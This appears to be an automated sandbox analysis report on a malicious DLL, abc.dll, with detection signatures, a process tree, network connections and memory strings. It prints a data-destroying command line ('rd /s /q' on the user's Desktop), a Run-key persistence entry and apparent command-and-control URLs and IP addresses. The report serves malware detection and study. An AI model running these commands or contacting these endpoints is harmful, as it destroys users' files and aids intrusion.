Edit tour

Windows Analysis Report
abc.dll

Overview

General Information

Sample Name:	abc.dll
Analysis ID:	574344
MD5:	4095efe5247d786f5c8f03ee2678fe0a
SHA1:	8fabbc1778b684e161d312a28aa16f065c3bf330
SHA256:	a5d3d3c385f1405b606bd2427f625f24c81266bca36d552f5eb61dc82f887276
Tags:	dll
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: UNC2452 Process Creation Patterns

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Creates an autostart registry key pointing to binary in C:\Windows

Found evasive API chain (may stop execution after checking mutex)

Found stalling execution ending in API Sleep call

Contains functionality to infect the boot sector

PE file has a writeable .text section

Connects to many ports of the same IP (likely port scanning)

Machine Learning detection for sample

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Sigma detected: Suspicious Call by Ordinal

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Sigma detected: CurrentVersion Autorun Keys Modification

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Entry point lies outside standard sections

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Sigma detected: Autorun Keys Modification

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 2436 cmdline: loaddll32.exe "C:\Users\user\Desktop\abc.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 468 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\abc.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5656 cmdline: rundll32.exe "C:\Users\user\Desktop\abc.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 5028 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 160 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

rundll32.exe (PID: 5668 cmdline: rundll32.exe C:\Users\user\Desktop\abc.dll,Dispatch MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4396 cmdline: rundll32.exe C:\Users\user\Desktop\abc.dll,InputFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4620 cmdline: rundll32.exe C:\Users\user\Desktop\abc.dll,PrintFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 2616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 736 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 3556 cmdline: rundll32.exe "C:\Users\user\Desktop\abc.dll",Dispatch MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 3352 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 4944 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

cmd.exe (PID: 5612 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 2604 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

rundll32.exe (PID: 3352 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\abc.dll",Dispatch MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 984 cmdline: rundll32.exe "C:\Users\user\Desktop\abc.dll",InputFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4912 cmdline: rundll32.exe "C:\Users\user\Desktop\abc.dll",PrintFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 1768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 732 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 456 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\abc.dll",Dispatch MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 3696 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 4684 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

cleanup

Sigma Signatures

System Summary

Sigma detected: UNC2452 Process Creation Patterns

Source: Process started

Author: Florian Roth: Data: Command: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop", CommandLine: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\abc.dll",Dispatch, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 456, ProcessCommandLine: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop", ProcessId: 3696

Sigma detected: Suspicious Call by Ordinal

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\abc.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\abc.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\abc.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 468, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\abc.dll",#1, ProcessId: 5656

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\abc.dll",Dispatch, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5668, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Disp

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\abc.dll",Dispatch, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5668, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Disp

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: abc.dll	Virustotal: Detection: 78%			Perma Link
Source: abc.dll	ReversingLabs: Detection: 93%

Antivirus / Scanner detection for submitted sample

Source: abc.dll

Avira: detected

Machine Learning detection for sample

Source: abc.dll

Joe Sandbox ML: detected

Source: 18.0.rundll32.exe.10000000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.0.rundll32.exe.10000000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.2.rundll32.exe.10000000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 18.0.rundll32.exe.10000000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.2.rundll32.exe.10000000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.0.rundll32.exe.10000000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 18.2.rundll32.exe.10000000.0.unpack	Avira: Label: TR/Dropper.Gen

Source: abc.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_10007F89 FindFirstFileA,FindNextFileA,

4_2_10007F89

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\microsoft.system.package.metadata\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\WindowsApps\Deleted\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\AppTiles\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 107.163.56.232 19	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 107.163.56.231 98	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 107.163.56.110 98	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 107.163.56.251 6658	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 123.126.45.92 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: blog.sina.com.cn

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 107.163.56.232 ports 18963,1,3,6,8,9
Source: global traffic	TCP traffic: 107.163.56.231 ports 18530,0,1,3,5,8
Source: global traffic	TCP traffic: 107.163.56.110 ports 18530,0,1,3,5,8

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: global traffic

TCP traffic: 192.168.2.5:49765 -> 123.126.45.92:80

Source: Joe Sandbox View	ASN Name: CHINA169-BJChinaUnicomBeijingProvinceNetworkCN CHINA169-BJChinaUnicomBeijingProvinceNetworkCN
Source: Joe Sandbox View	ASN Name: TAKE2US TAKE2US

Source: global traffic	TCP traffic: 192.168.2.5:49751 -> 107.163.56.231:18530
Source: global traffic	TCP traffic: 192.168.2.5:49752 -> 107.163.56.110:18530
Source: global traffic	TCP traffic: 192.168.2.5:49762 -> 107.163.56.251:6658
Source: global traffic	TCP traffic: 192.168.2.5:49763 -> 107.163.56.232:18963

Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.231
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.231
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.231
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown	TCP traffic detected without corresponding DNS query: 107.163.56.232

Source: rundll32.exe, 00000004.00000002.774825715.000000000531E000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.774894959.000000000539E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://107.16
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.110:18530/u1129.html
Source: rundll32.exe, rundll32.exe, 00000012.00000000.274634042.0000000010012000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://107.163.56.231:18530/
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.231:18530//joy.asp?sid=rungnejcntCWrem5Fe5vteX8v2LUicbtudb8mtiWnZeYmZK
Source: rundll32.exe, 00000004.00000002.772649123.00000000002DB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.231:18530/joy.asp?sid=rungnejcntCWrem5Fevte
Source: rundll32.exe, 00000004.00000003.550575319.0000000002942000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:
Source: rundll32.exe, rundll32.exe, 00000012.00000000.274634042.0000000010012000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.php
Source: rundll32.exe, 00000004.00000003.497981630.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.463294098.00000000028FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.php-
Source: rundll32.exe, 00000004.00000003.621544263.000000000296B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.php.
Source: rundll32.exe, 00000004.00000003.573233556.0000000002937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.php.sina.com.cn
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.php?
Source: rundll32.exe, 00000004.00000002.775076173.00000000055BA000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.774894959.000000000539E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpC:
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpJ
Source: rundll32.exe, 00000004.00000003.523865021.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.515136005.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.523761741.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.621676038.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.621544263.000000000296B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpP
Source: rundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpata
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpf
Source: rundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.410069528.00000000028FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phph
Source: rundll32.exe, 00000004.00000003.463071693.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.463965680.000000000296B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpiceActivation
Source: rundll32.exe, 00000004.00000003.506438395.0000000002933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpileMaps
Source: rundll32.exe, 00000004.00000003.769259388.00000000028FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phplication
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpn
Source: rundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.410069528.00000000028FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpp
Source: rundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpr
Source: rundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phption
Source: rundll32.exe, 00000004.00000003.769259388.00000000028FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.497981630.00000000028FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.phpz
Source: rundll32.exe, 00000004.00000003.463071693.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.463965680.000000000296B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.php~
Source: rundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:18963/main.php~-
Source: rundll32.exe, 00000004.00000003.573233556.0000000002937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.56.232:n/u/5762479093
Source: rundll32.exe, 00000004.00000003.700288987.0000000002936000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.550621832.0000000002949000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.700120244.0000000002933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.c
Source: rundll32.exe, 00000004.00000003.621355433.0000000002933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.c-k
Source: rundll32.exe, 00000004.00000003.648250545.0000000002946000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.523736997.0000000002944000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.515119198.0000000002944000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.648222459.0000000002936000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.506457934.0000000002945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.c18963/main.php
Source: rundll32.exe, 00000004.00000002.777086863.0000000006E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/%s
Source: rundll32.exe, 00000004.00000003.551151432.000000000296B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093
Source: rundll32.exe, 00000004.00000003.321114729.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.321172786.0000000002938000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093$n
Source: rundll32.exe, 00000004.00000003.506492587.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.769142464.000000000296B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093.
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/57624790932
Source: rundll32.exe, 00000004.00000002.773183243.00000000028CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093I
Source: rundll32.exe, 00000004.00000003.498090383.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.700183285.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.700339140.000000000296B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.506492587.000000000296B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093P
Source: rundll32.exe, 00000004.00000003.401571882.00000000028FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093i
Source: rundll32.exe, 00000004.00000003.700389541.00000000028FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5762479093lication
Source: Amcache.hve.15.dr	String found in binary or memory: http://upx.sf.net

Source: unknown

DNS traffic detected: queries for: blog.sina.com.cn

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_10003F41 InternetReadFile,

4_2_10003F41

System Summary

PE file has a writeable .text section

Source: abc.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: abc.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 736

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10003F63 ExitWindowsEx,	4_2_10003F63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_10003F63 ExitWindowsEx,	12_2_10003F63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_10003F63 ExitWindowsEx,	18_2_10003F63

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000B235	4_2_1000B235
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000B71E	4_2_1000B71E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100121ED	4_2_100121ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000AED1	4_2_1000AED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_026E00CD	4_2_026E00CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_030B00CD	5_2_030B00CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_1000B235	12_2_1000B235
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_1000B71E	12_2_1000B71E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_100121ED	12_2_100121ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_1000AED1	12_2_1000AED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_048300CD	12_2_048300CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_041700CD	16_2_041700CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_1000B235	18_2_1000B235
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_1000B71E	18_2_1000B71E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_100121ED	18_2_100121ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_1000AED1	18_2_1000AED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_032B00CD	18_2_032B00CD

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10001000 appears 933 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10009136 appears 39 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 1000CDA0 appears 46 times

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_10008B8B: DeviceIoControl,

4_2_10008B8B

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: abc.dll

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Source: abc.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: abc.dll	Virustotal: Detection: 78%
Source: abc.dll	ReversingLabs: Detection: 93%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\abc.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\abc.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,Dispatch
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
